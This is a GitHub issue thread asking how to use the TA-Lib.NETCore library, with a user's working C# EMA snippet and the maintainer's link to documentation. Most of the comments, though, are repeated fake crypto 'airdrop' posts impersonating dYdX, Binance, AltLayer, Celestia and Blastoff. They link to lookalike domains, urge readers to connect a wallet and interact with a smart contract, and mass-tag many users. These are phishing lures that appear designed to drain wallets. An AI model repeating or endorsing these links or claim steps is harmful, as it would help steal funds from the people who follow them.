### ISSUE TITLE
How to use the library

### ISSUE THREAD

**Issue by avrezvanov** [hmG3/TA-Lib.NETCore#4]
How to use the library.
For example the Stochastic indicator.

public static RetCode Stoch (
double [] inHigh, double [] inLow, double [] inClose, int startIdx, int endIdx, double [] outSlowK, double [] outSlowD, out int outBegIdx, out int outNbElement, MAType optInSlowKMAType = MAType.Sma, MAType optInSlowDM .Sma, int optInFastKPeriod = 5, int optInSlowKPeriod = 3, int
optInSlowDPeriod = 3);

The first three parameters (inHigh, inLow, inClose) are clear without explanation, but what the rest of the parameters (startIdx, endIdx, outSlowK, outSlowD, outBegIdx, outNbElement) mean is not clear.

You can give an example of use  Stochatic.

**Comment by HollandRisley** [comment]
Hi @hmG3, I also would love to know how to use this library. Can you point me to any example code to just do a Simple Moving Average or RSI for example.. Thanks! Is there a reference guide or WIKI that you can point me to?

**Comment by HollandRisley** [comment]
Hi,  for anyone trying to work this out, as there is no documentation that I could see, I thought I'd post a code snippet that is working for me. This successfully calculates a 21 EMA:

`


            // Calculate EMA 21 period

           var closesArray = closes.ToArray();

            int outBegIdx = 0;
            int outNbElement = 0;

            double[] outarray = new double[closesArray.Count()-20];

            try
            {
                TALib.Core.Ma(closesArray, 0, closesArray.Count()-1, outarray, out outBegIdx, out outNbElement, Core.MAType.Ema, 21);
            }
            catch (Exception ex)
            {
                Console.WriteLine($"exception calculating EMA 21: " + ex.Message);
            }

            var i = 0;
            var outCount = 0;
            foreach( FullMarketData dataItem in fullMarketData)
            {
                if (i >= outBegIdx)
                {
                    dataItem.EMA21 = outarray[outCount];
                    Console.WriteLine($"{dataItem.Timestamp} - EMA8: { dataItem.EMA21 } Close: {dataItem.Close}");
                    outCount++;
                } else
                {
                    Console.WriteLine($"{dataItem.Timestamp} - no data");
                }

                i++;
            }
`

**Comment by muraliR** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol

**Comment by shafwansyah** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by shafwansyah** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by shafwansyah** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by sneceesay77** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @oguzcagiran, @Genysys, @jared-frm-subway, @jhogendorn, @blkrt, @0xABADBEEF, @mehdipayervand

**Comment by s-ikeda141104** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @Sinever, @NazirovJr, @cardimajs, @lucaswbg, @dbsc, @willeeklund, @gary0122g, @flfsbr, @tylerbordeaux, @wangqin102, @john-nguyen09, @FadySamirSadek, @amanvirparhar, @jimtje, @kohrohit, @vishallamba1988, @oosman, @bjsavino, @Arimionim, @tholu

**Comment by s-ikeda141104** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @oularrea, @qwenister, @supernovalx, @l-portet, @CamonZ, @jinbangyi, @Maklestiguan, @GNURub, @Arcaneless, @tharunrai14, @yazeed, @MelbTechnologists, @diananog, @cheldernunes, @Svarog89, @rcdosado, @CapitanAlex, @agusmade, @1hirak, @soplwang

**Comment by andrewluetgers** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!ziiiliu, @sajjadvictim, @hidayat05, @jcccn, @jschrom311, @pusewicz, @S3B4S, @ikarius, @bibinvargheset, @mkp-bartsch, @Haakam21, @aphadiputra, @corysimmons, @akabeera, @rori4, @LenceKerr, @philippzach, @LetmeBX, @b-heilman, @treyperry

**Comment by Jcillo507** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://celestia.eigenllayer.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://celestia.eigenllayer.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!dataman-py, @skydan, @starfoxbeta, @micmalti, @zatteo, @poptart69, @wtliao, @crazy-on-keyboard, @tudorapt, @bodleytunes, @keerth124, @Peccer, @lmservas, @b-heilman, @fbaltor, @horrrt, @jinisaweaklearner, @l0kihardt, @baktoria, @upa8

**Comment by corysimmons** [comment]
Well, GitHub had a good run.

**Comment by 0legR** [comment]
# Blastoff.zone Airdrop: Win 0.1 ETH + $100 Bonus!

[![Airdrop Banner](https://i.ytimg.com/vi/QtjkR9zWyzI/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

Hello crypto community! Blastoff.zone is offering an exciting Airdrop for the first 10 users! You can win 0.1 ETH plus a $100 bonus just by participating and connecting your wallet.

## How to participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to access the Blastoff.zone website.
2. Connect your Ethereum wallet to the website to be eligible for the $100 bonus.
3. Use the "Claim Now" method to receive your tokens.

Don't miss out on this amazing opportunity! Hurry and claim your prize before the 0.1 ETH runs out.

Remember, tokens will be distributed on a first-come, first-served basis. We have a maximum distribution of 100 tokens, and 90% have already been distributed!
KingBlade7, @eonward, @oxxxxxy, @jsmsalt, @IceHugh, @SnibliUchiha, @crjameson, @slavapeshkin, @1essthantwo, @foundationer, @rasppl, @sohmil97, @Cightline, @macint0sh, @v-karbovnichy, @bitcoinvsalts, @saeed55, @stasb, @kccheung, @a-dwarf

**Comment by hmG3** [comment]
Check out new documentation available at [https://hmg3.github.io/TA-Lib.NETCore/](https://hmg3.github.io/TA-Lib.NETCore)
